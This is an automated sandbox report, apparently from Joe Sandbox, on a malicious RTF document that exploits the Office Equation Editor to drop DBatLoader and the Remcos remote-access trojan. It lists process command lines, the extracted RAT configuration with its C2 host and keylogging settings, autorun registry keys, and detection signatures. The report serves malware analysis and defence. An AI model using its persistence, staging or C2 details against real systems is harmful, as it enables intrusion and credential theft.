Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
OKhCyJ619J.rtf

Overview

General Information

Sample name:OKhCyJ619J.rtf
renamed because original name is a hash value
Original sample name:956ae61939b3dc9f9bbaed850423740b.rtf
Analysis ID:1430800
MD5:956ae61939b3dc9f9bbaed850423740b
SHA1:4b4df10a00758993952f3528561f7edbc630376e
SHA256:67d023bc333bfbf254e2501026b793921c1bdb9fcff76f5c168c4caaf7887774
Tags:rtf
Infos:

Detection

Remcos, DBatLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Sigma detected: Remcos
Snort IDS alert for network traffic
Yara detected DBatLoader
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Creates autostart registry keys with suspicious names
Creates multiple autostart registry keys
Document exploit detected (process start blacklist hit)
Drops PE files with a suspicious file extension
Installs a global keyboard hook
Installs new ROOT certificates
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Office equation editor drops PE file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
PE file contains section with special chars
Searches for Windows Mail specific files
Shellcode detected
Sigma detected: Equation Editor Network Connection
Sigma detected: Execution from Suspicious Folder
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Suspicious Binary In User Directory Spawned From Office Application
Sigma detected: Suspicious Microsoft Office Child Process
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Uses dynamic DNS services
Yara detected WebBrowserPassView password recovery tool
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and execute PE files
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Office Equation Editor has been started
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Stores large binary data to the registry
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Keylogger Generic
Yara signature match

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 3176 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • EQNEDT32.EXE (PID: 3264 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
      • hjc.exe (PID: 3416 cmdline: "C:\Users\user\AppData\Roaming\hjc.exe" MD5: 46AE1DD2F5A1756EC2166E365971254D)
        • cmd.exe (PID: 3536 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\RdxcjsngO.bat" " MD5: AD7B9C14083B52BC532FBA5948342B98)
        • extrac32.exe (PID: 3552 cmdline: C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\AppData\Roaming\hjc.exe C:\\Users\\Public\\Libraries\\Rdxcjsng.PIF MD5: 4D306ED01994EDF577B98FD59BF269C0)
        • remcos.exe (PID: 3572 cmdline: "C:\ProgramData\Remcos\remcos.exe" MD5: 46AE1DD2F5A1756EC2166E365971254D)
          • remcos.exe (PID: 3840 cmdline: C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\qrvhclucfnyufuwghezckwpljsyrzdsj" MD5: 46AE1DD2F5A1756EC2166E365971254D)
          • remcos.exe (PID: 3848 cmdline: C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\amas" MD5: 46AE1DD2F5A1756EC2166E365971254D)
          • remcos.exe (PID: 3864 cmdline: C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\dgnkdwq" MD5: 46AE1DD2F5A1756EC2166E365971254D)
          • remcos.exe (PID: 1804 cmdline: C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\pisbdjmsvpzm" MD5: 46AE1DD2F5A1756EC2166E365971254D)
          • remcos.exe (PID: 1712 cmdline: C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\skxtebeuixrzqiq" MD5: 46AE1DD2F5A1756EC2166E365971254D)
          • remcos.exe (PID: 200 cmdline: C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\cecmfupoefjdsweembv" MD5: 46AE1DD2F5A1756EC2166E365971254D)
    • EQNEDT32.EXE (PID: 3856 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
  • Rdxcjsng.PIF (PID: 3784 cmdline: "C:\Users\Public\Libraries\Rdxcjsng.PIF" MD5: 46AE1DD2F5A1756EC2166E365971254D)
  • remcos.exe (PID: 3984 cmdline: "C:\ProgramData\Remcos\remcos.exe" MD5: 46AE1DD2F5A1756EC2166E365971254D)
  • remcos.exe (PID: 172 cmdline: "C:\ProgramData\Remcos\remcos.exe" MD5: 46AE1DD2F5A1756EC2166E365971254D)
  • Rdxcjsng.PIF (PID: 3328 cmdline: "C:\Users\Public\Libraries\Rdxcjsng.PIF" MD5: 46AE1DD2F5A1756EC2166E365971254D)
  • remcos.exe (PID: 3268 cmdline: "C:\ProgramData\Remcos\remcos.exe" MD5: 46AE1DD2F5A1756EC2166E365971254D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
DBatLoaderThis Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": "uckdns.org:1166:0", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Enable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-L24XL1", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
OKhCyJ619J.rtfINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0x1acd:$obj2: \objdata
  • 0x1ab3:$obj3: \objupdate

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\Public\Libraries\RdxcjsngO.batMALWARE_BAT_KoadicBATKoadic post-exploitation framework BAT payloadditekSHen
  • 0x2:$s1: &@cls&@set
  • 0x5b:$s2: :~41,1%%
  • 0x67:$s2: :~47,1%%
  • 0x73:$s2: :~6,1%%
  • 0x7e:$s2: :~53,1%%
  • 0x8a:$s2: :~1,1%
  • 0x9b:$s2: :~10,1%%
  • 0xa7:$s2: :~39,1%%
  • 0xb3:$s2: :~16,1%%
  • 0xbf:$s2: :~13,1%%
  • 0xcb:$s2: :~25,1%%
  • 0xd7:$s2: :~53,1%%
  • 0xe3:$s2: :~42,1%%
  • 0xef:$s2: :~22,1%%
  • 0xfb:$s2: :~18,1%%
  • 0x107:$s2: :~48,1%%
  • 0x113:$s2: :~51,1%%
  • 0x11f:$s2: :~2,1%%
  • 0x12a:$s2: :~61,1%%
  • 0x136:$s2: :~9,1%%
  • 0x141:$s2: :~19,1%%
C:\ProgramData\fggrt\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000019.00000002.493989881.0000000003191000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
      00000019.00000002.493552957.00000000006E7000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000017.00000002.464677307.00000000002CF000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          00000018.00000002.468510492.00000000007A9000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
            00000005.00000002.372380692.00000000002B9000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
              Click to see the 43 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              5.2.hjc.exe.318e1e0.3.raw.unpackJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
                12.2.Rdxcjsng.PIF.3003d38.2.unpackJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
                  5.2.hjc.exe.312984c.0.unpackJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
                    12.2.Rdxcjsng.PIF.2fe2a1c.1.raw.unpackJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
                      12.2.Rdxcjsng.PIF.3003d38.2.raw.unpackJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
                        Click to see the 13 entries

                        Sigma Signatures

                        Exploits

                        barindex
                        Sigma detected: EQNEDT32.EXE connecting to internet
                        Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 103.198.26.173, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3264, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49163
                        Sigma detected: File Dropped By EQNEDT32EXE
                        Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3264, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\HJC[1].exe

                        System Summary

                        barindex
                        Sigma detected: Equation Editor Network Connection
                        Source: Network ConnectionAuthor: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49163, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3264, Protocol: tcp, SourceIp: 103.198.26.173, SourceIsIpv6: false, SourcePort: 80
                        Sigma detected: Execution from Suspicious Folder
                        Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Users\Public\Libraries\Rdxcjsng.PIF" , CommandLine: "C:\Users\Public\Libraries\Rdxcjsng.PIF" , CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\Rdxcjsng.PIF, NewProcessName: C:\Users\Public\Libraries\Rdxcjsng.PIF, OriginalFileName: C:\Users\Public\Libraries\Rdxcjsng.PIF, ParentCommandLine: , ParentImage: , ParentProcessId: 1244, ProcessCommandLine: "C:\Users\Public\Libraries\Rdxcjsng.PIF" , ProcessId: 3784, ProcessName: Rdxcjsng.PIF
                        Sigma detected: New RUN Key Pointing to Suspicious Folder
                        Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\Public\Rdxcjsng.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\hjc.exe, ProcessId: 3416, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Rdxcjsng
                        Sigma detected: Suspicious Binary In User Directory Spawned From Office Application
                        Source: Process startedAuthor: Jason Lynch: Data: Command: "C:\Users\user\AppData\Roaming\hjc.exe" , CommandLine: "C:\Users\user\AppData\Roaming\hjc.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\hjc.exe, NewProcessName: C:\Users\user\AppData\Roaming\hjc.exe, OriginalFileName: C:\Users\user\AppData\Roaming\hjc.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3264, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\hjc.exe" , ProcessId: 3416, ProcessName: hjc.exe
                        Sigma detected: Suspicious Microsoft Office Child Process
                        Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Users\user\AppData\Roaming\hjc.exe" , CommandLine: "C:\Users\user\AppData\Roaming\hjc.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\hjc.exe, NewProcessName: C:\Users\user\AppData\Roaming\hjc.exe, OriginalFileName: C:\Users\user\AppData\Roaming\hjc.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3264, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\hjc.exe" , ProcessId: 3416, ProcessName: hjc.exe
                        Sigma detected: CurrentVersion Autorun Keys Modification
                        Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\Public\Rdxcjsng.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\hjc.exe, ProcessId: 3416, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Rdxcjsng
                        Sigma detected: Execution of Suspicious File Type Extension
                        Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: "C:\Users\Public\Libraries\Rdxcjsng.PIF" , CommandLine: "C:\Users\Public\Libraries\Rdxcjsng.PIF" , CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\Rdxcjsng.PIF, NewProcessName: C:\Users\Public\Libraries\Rdxcjsng.PIF, OriginalFileName: C:\Users\Public\Libraries\Rdxcjsng.PIF, ParentCommandLine: , ParentImage: , ParentProcessId: 1244, ProcessCommandLine: "C:\Users\Public\Libraries\Rdxcjsng.PIF" , ProcessId: 3784, ProcessName: Rdxcjsng.PIF
                        Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
                        Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\ProgramData\Remcos\remcos.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\hjc.exe, ProcessId: 3416, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Rmc-L24XL1
                        Sigma detected: Modification of IE Registry Settings
                        Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3264, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
                        Sigma detected: Office Macro File Creation
                        Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 3176, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

                        Stealing of Sensitive Information

                        barindex
                        Sigma detected: Remcos
                        Source: Registry Key setAuthor: Joe Security: Data: Details: D4 68 E8 10 40 21 E7 10 45 0C 9F 6C 6A 8B 27 14 CE 9A D2 52 3B D7 CD 49 DC 24 A4 50 2A 85 A6 2D 49 52 F2 DA 72 59 6E 65 72 08 F0 2B 2F 89 F7 EC BE F9 EC E1 9F DE 0E 6A 73 54 3B CC 6D FD 76 2F AB 2A , EventID: 13, EventType: SetValue, Image: C:\ProgramData\Remcos\remcos.exe, ProcessId: 3572, TargetObject: HKEY_CURRENT_USER\Software\Rmc-L24XL1\exepath

                        Snort Signatures

                        Timestamp:04/24/24-07:44:31.694493
                        SID:2032777
                        Source Port:1166
                        Destination Port:49170
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/24/24-07:42:15.923174
                        SID:2032776
                        Source Port:49170
                        Destination Port:1166
                        Protocol:TCP
                        Classtype:A Network Trojan was detected

                        Joe Sandbox Signatures

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Antivirus / Scanner detection for submitted sample
                        Source: OKhCyJ619J.rtfAvira: detected
                        Antivirus detection for URL or domain
                        Source: http://geoplugin.net/json.gp/CURL Reputation: Label: phishing
                        Source: http://geoplugin.net/json.gpURL Reputation: Label: phishing
                        Antivirus detection for dropped file
                        Source: C:\Users\Public\Libraries\netutils.dllAvira: detection malicious, Label: TR/AVI.Agent.rqsyc
                        Found malware configuration
                        Source: 00000017.00000002.464677307.00000000002CF000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "uckdns.org:1166:0", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Enable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-L24XL1", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
                        Multi AV Scanner detection for dropped file
                        Source: C:\ProgramData\Remcos\remcos.exeReversingLabs: Detection: 71%
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\HJC[1].exeReversingLabs: Detection: 71%
                        Source: C:\Users\user\AppData\Roaming\hjc.exeReversingLabs: Detection: 71%
                        Source: C:\Users\Public\Libraries\Rdxcjsng.PIFReversingLabs: Detection: 71%
                        Source: C:\Users\Public\Libraries\netutils.dllReversingLabs: Detection: 82%
                        Multi AV Scanner detection for submitted file
                        Source: OKhCyJ619J.rtfReversingLabs: Detection: 55%
                        Yara detected Remcos RAT
                        Source: Yara matchFile source: 5.2.hjc.exe.15ca0000.10.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.2.hjc.exe.15ca0000.10.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000019.00000002.493552957.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000017.00000002.464677307.00000000002CF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000018.00000002.468510492.00000000007A9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.372380692.00000000002B9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.395322214.0000000000729000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000019.00000002.493552957.0000000000695000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000002.845486984.000000000071F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000011.00000002.431190937.00000000006A9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000011.00000002.431190937.00000000006D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.379080193.000000007DA80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: hjc.exe PID: 3416, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: remcos.exe PID: 3572, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: Rdxcjsng.PIF PID: 3784, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: remcos.exe PID: 3984, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: remcos.exe PID: 172, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: Rdxcjsng.PIF PID: 3328, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: remcos.exe PID: 3268, type: MEMORYSTR
                        Source: Yara matchFile source: C:\ProgramData\fggrt\logs.dat, type: DROPPED
                        Machine Learning detection for dropped file
                        Source: C:\Users\Public\Libraries\Rdxcjsng.PIFJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Roaming\hjc.exeJoe Sandbox ML: detected
                        Source: C:\ProgramData\Remcos\remcos.exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\HJC[1].exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_15CD3837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,5_2_15CD3837
                        Source: hjc.exeBinary or memory string: -----BEGIN PUBLIC KEY-----

                        Exploits

                        barindex
                        Yara detected UAC Bypass using CMSTP
                        Source: Yara matchFile source: 5.2.hjc.exe.15ca0000.10.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.2.hjc.exe.15ca0000.10.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.379080193.000000007DA80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: hjc.exe PID: 3416, type: MEMORYSTR
                        Office equation editor establishes network connection
                        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 103.198.26.173 Port: 80Jump to behavior
                        Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
                        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\hjc.exe
                        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\hjc.exeJump to behavior
                        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

                        Privilege Escalation

                        barindex
                        Contains functionality to bypass UAC (CMSTPLUA)
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_15CA74FD _wcslen,CoGetObject,5_2_15CA74FD
                        Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.22:49165 version: TLS 1.0
                        Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.22:49168 version: TLS 1.0
                        Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.22:49175 version: TLS 1.0
                        Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.22:49178 version: TLS 1.0
                        Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.22:49181 version: TLS 1.0
                        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                        Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: hjc.exe, 00000005.00000003.369004868.000000007E560000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000002.376031931.00000000145E0000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000002.379695634.000000007E2E0000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000003.368787368.000000007DD50000.00000004.00000800.00020000.00000000.sdmp, Rdxcjsng.PIF, 0000000C.00000002.399328238.00000000145DF000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: easinvoker.pdb source: hjc.exe, 00000005.00000002.376031931.00000000145E0000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000002.379695634.000000007E2E0000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000003.368787368.000000007DD50000.00000004.00000800.00020000.00000000.sdmp, Rdxcjsng.PIF, 0000000C.00000002.399328238.00000000145DF000.00000004.00000800.00020000.00000000.sdmp, easinvoker.exe.5.dr
                        Source: Binary string: easinvoker.pdbH source: hjc.exe, 00000005.00000003.369109514.000000001573E000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000002.376031931.00000000145E0000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000002.379695634.000000007E2E0000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000003.368787368.000000007DD50000.00000004.00000800.00020000.00000000.sdmp, Rdxcjsng.PIF, 0000000C.00000002.399328238.00000000145DF000.00000004.00000800.00020000.00000000.sdmp, easinvoker.exe.5.dr
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_15CA880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,5_2_15CA880C
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_15CA783C FindFirstFileW,FindNextFileW,5_2_15CA783C
